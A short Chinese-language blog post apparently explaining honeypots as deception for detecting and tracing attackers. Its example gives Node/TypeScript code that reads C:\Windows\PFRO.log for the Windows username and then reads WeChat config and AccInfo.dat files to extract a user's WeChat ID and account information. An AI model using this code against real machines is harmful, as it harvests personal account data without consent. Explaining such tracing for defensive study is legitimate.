概述
蜜罐是对攻击者的欺骗技术,用以监视、检测、分析和溯源攻击行为
蜜罐没有业务上的用途,所有流入/流出蜜罐的流量都预示着扫描或者攻击行为,因此可以比较好的聚焦于攻击流量
蜜罐可以实现对攻击者的主动诱捕,能详细地记录攻击者攻击过程中的许多痕迹,收集到大量有价值的数据,如病毒或蠕虫的源码、黑客的操作等,从而便于提供丰富的溯源数据
蜜罐也可以消耗攻击者的时间,基于JSONP等方式来获取攻击者的画像
所以蜜罐就是一个陷阱,故意暴露一些人为设计好的漏洞,让攻击者自投罗网
但是蜜罐存在安全隐患,如果没有做好隔离,可能成为新的攻击源
案例
C:\Windows\PFRO.log文件用于存放ISA监控日志,通过这个文件可以读取系统的的用户名
得到用户名后就可以读取一些系统文件,例如读取微信个人信息:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| import fs from 'fs';
const getWxId = <T>(path: T) => {
const data = fs.readFileSync(`C:/Users/${path}/Documents/WeChat Files/All Users/config/config.data`).toString('utf8')
const reg = /Documents\\WeChat Files\\([^\\]*)/ig
reg.test(data)
return RegExp.$1
}
const getData = <T>(path: T, wxId: T) => {
const data = fs.readFileSync(`C:/Users/${path}/Documents/WeChat Files/${wxId}/config/AccInfo.dat`).toString('utf-8')
return data
}
fs.readFile('C:/Windows/PFRO.log', async (err, data) => {
const exp = /Users\\([^\\]*)/ig
exp.test(data.toString('utf16le'))
const userName = RegExp.$1
const wxId = await getWxId(userName)
const info = await getData(userName, wxId)
console.log(info);
})
|
wechat
alipay
